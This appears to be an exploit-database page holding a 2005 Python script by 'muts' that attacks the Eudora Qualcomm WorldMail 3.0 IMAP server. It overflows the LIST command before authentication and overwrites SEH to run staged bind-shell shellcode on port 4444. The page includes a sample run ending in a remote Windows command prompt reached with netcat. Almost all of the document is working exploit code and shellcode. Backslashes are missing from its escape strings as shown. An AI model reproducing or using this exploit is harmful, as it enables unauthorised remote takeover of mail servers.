Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit
# Published : 2005-12-20
# Author : muts
# Previous Title : Windows XP/2003 Metafile Escape() Code Execution Exploit (meta)
# Next Title : BlueCoat WinProxy 6.0 R1c (Host) Remote Stack/SEH Overflow Exploit
#!/usr/bin/python
###################################################################################
#
# PRE AUTHENTICATION Eudora Qualcomm WorldMail 3.0 IMAPd Service 6.1.19.0 Overflow.
#
# Discovered by  Tim Shelton - security-advisories@acs-inc.com
#
# Coded by mati@see-security.com
#
# Details:
# * SEH gets overwritten at 970 bytes in the LIST command.
# * No space for shellcode, so 1st stage shellcode is used to
#   jump back 768 bytes into the bindshell (2nd stage) shellcode.
#
# Thanks:
# * My wife - for putting up with my obesssions
#                FOR EDUCATION PURPOSES ONLY!
###################################################################################
# root@muts:/tmp# ./test.py 192.168.1.162
#
# Eudora Qualcomm WorldMail 3.0 IMAPd Service 6.1.19.0 Overflow.
#
# Discovered by  Tim Shelton - security-advisories@acs-inc.com
# Coded by mati@see-security.com
#
# [+] Connecting
# [+] * OK  WorldMail IMAP4 Server 6.1.19.0 ready
# [+] Look Maa - No authentication!
# [+] Sending evil buffer...
# [+] Done
#
# [+] Connect to port 4444 on victim IP - Muhahaha!
#
# root@muts:/tmp# nc -vn 192.168.1.162 4444
# (UNKNOWN) [192.168.1.162] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:WINNTsystem32>
#############################################################################

import sys
import struct
import socket
from time import sleep

def banner():
        print "nEudora Qualcomm WorldMail 3.0 IMAPd Service 6.1.19.0Overflow.n"
        print "Discovered by  Tim Shelton - security-advisories@acs-inc.com"
        print "Coded by mati@see-security.comn"
 
if len(sys.argv)!=3:
        banner()
        print "Usage: eudora-imap-LIST.py <ip> <port>n"
        sys.exit(0)
        
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Using Msf::Encoder::PexFnstenvMov with final size of 42 bytes
# First Stage Shellcode
sc3  ="x6ax05x59xd9xeexd9x74x24xf4x5bx81x73x13x2fx77x28"
sc3 +="x4bx83xebxfcxe2xf4xf6x99xf1x3fx0bx83x71xcbxeex7d"
sc3 +="xb8xb5xe2x89xe5xb5xe2x88xc9x4b"

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com */
# Second Stage Shellcode
sc4  ="xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
sc4 +="x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
sc4 +="x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
sc4 +="x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
sc4 +="x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e"
sc4 +="x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x56x4bx38"
sc4 +="x4ex36x46x32x46x52x4bx58x45x54x4ex53x4bx38x4ex37"
sc4 +="x45x50x4ax47x41x30x4fx4ex4bx38x4fx34x4ax31x4bx48"
sc4 +="x4fx35x42x52x41x30x4bx4ex49x54x4bx48x46x33x4bx58"
sc4 +="x41x50x50x4ex41x43x42x4cx49x59x4ex4ax46x38x42x4c"
sc4 +="x46x57x47x30x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e"
sc4 +="x46x4fx4bx33x46x35x46x52x4ax32x45x37x45x4ex4bx48"
sc4 +="x4fx35x46x32x41x50x4bx4ex48x36x4bx38x4ex50x4bx34"
sc4 +="x4bx38x4fx55x4ex41x41x30x4bx4ex43x30x4ex32x4bx38"
sc4 +="x49x48x4ex36x46x32x4ex41x41x36x43x4cx41x53x4bx4d"
sc4 +="x46x56x4bx58x43x54x42x53x4bx48x42x34x4ex50x4bx58"
sc4 +="x42x37x4ex41x4dx4ax4bx58x42x44x4ax30x50x55x4ax46"
sc4 +="x50x38x50x44x50x50x4ex4ex42x35x4fx4fx48x4dx48x56"
sc4 +="x43x55x48x56x4ax46x43x53x44x53x4ax56x47x37x43x57"
sc4 +="x44x43x4fx45x46x45x4fx4fx42x4dx4ax56x4bx4cx4dx4e"
sc4 +="x4ex4fx4bx43x42x35x4fx4fx48x4dx4fx45x49x38x45x4e"
sc4 +="x48x36x41x38x4dx4ex4ax30x44x50x45x55x4cx36x44x30"
sc4 +="x4fx4fx42x4dx4ax56x49x4dx49x30x45x4fx4dx4ax47x55"
sc4 +="x4fx4fx48x4dx43x55x43x45x43x45x43x45x43x45x43x44"
sc4 +="x43x45x43x44x43x55x4fx4fx42x4dx48x36x4ax56x41x31"
sc4 +="x4ex55x48x46x43x45x49x48x41x4ex45x49x4ax46x46x4a"
sc4 +="x4cx51x42x57x47x4cx47x35x4fx4fx48x4dx4cx36x42x31"
sc4 +="x41x35x45x45x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x42"
sc4 +="x49x4ex47x45x4fx4fx48x4dx43x45x45x35x4fx4fx42x4d"
sc4 +="x4ax36x45x4ex49x54x48x48x49x54x47x55x4fx4fx48x4d"
sc4 +="x42x35x46x45x46x55x45x45x4fx4fx42x4dx43x49x4ax46"
sc4 +="x47x4ex49x37x48x4cx49x37x47x35x4fx4fx48x4dx45x55"
sc4 +="x4fx4fx42x4dx48x36x4cx56x46x36x48x46x4ax36x43x56"
sc4 +="x4dx56x49x58x45x4ex4cx56x42x45x49x35x49x32x4ex4c"
sc4 +="x49x38x47x4ex4cx36x46x54x49x38x44x4ex41x33x42x4c"
sc4 +="x43x4fx4cx4ax50x4fx44x44x4dx52x50x4fx44x34x4ex32"
sc4 +="x43x59x4dx58x4cx57x4ax53x4bx4ax4bx4ax4bx4ax4ax36"
sc4 +="x44x57x50x4fx43x4bx48x51x4fx4fx45x57x46x44x4fx4f"
sc4 +="x48x4dx4bx55x47x55x44x55x41x55x41x45x41x35x4cx46"
sc4 +="x41x30x41x35x41x45x45x55x41x55x4fx4fx42x4dx4ax56"
sc4 +="x4dx4ax49x4dx45x30x50x4cx43x45x4fx4fx48x4dx4cx36"
sc4 +="x4fx4fx4fx4fx47x33x4fx4fx42x4dx4bx38x47x55x4ex4f"
sc4 +="x43x58x46x4cx46x36x4fx4fx48x4dx44x45x4fx4fx42x4d"
sc4 +="x4ax46x42x4fx4cx58x46x30x4fx35x43x35x4fx4fx48x4d"
sc4 +="x4fx4fx42x4dx5a"

# Win2k SP4 JMP EBX - 0x77E1CCF7

buffer = 'x90'*61 + sc4+ "xebx06x06xeb" + 'xf7xccxe1x77' + 'x90'*8 + sc3 + '}'*400
banner()
try:
	s.connect((sys.argv[1],int(sys.argv[2])))
except:
	print "Can't connect to server!n"
	sys.exit(0)
print "[+] Connecting"
data=s.recv(1024)
print "[+] "+data.rstrip()
print "[+] Look Maa - No authentication!"
print "[+] Sending evil buffer..."
s.send('a001 LIST '+buffer+'rn')
s.close()
print "[+] Donen"
print "[+] Connect to port 4444 on victim IP - Muhahaha!n"

# www.Syue.com [2005-12-20]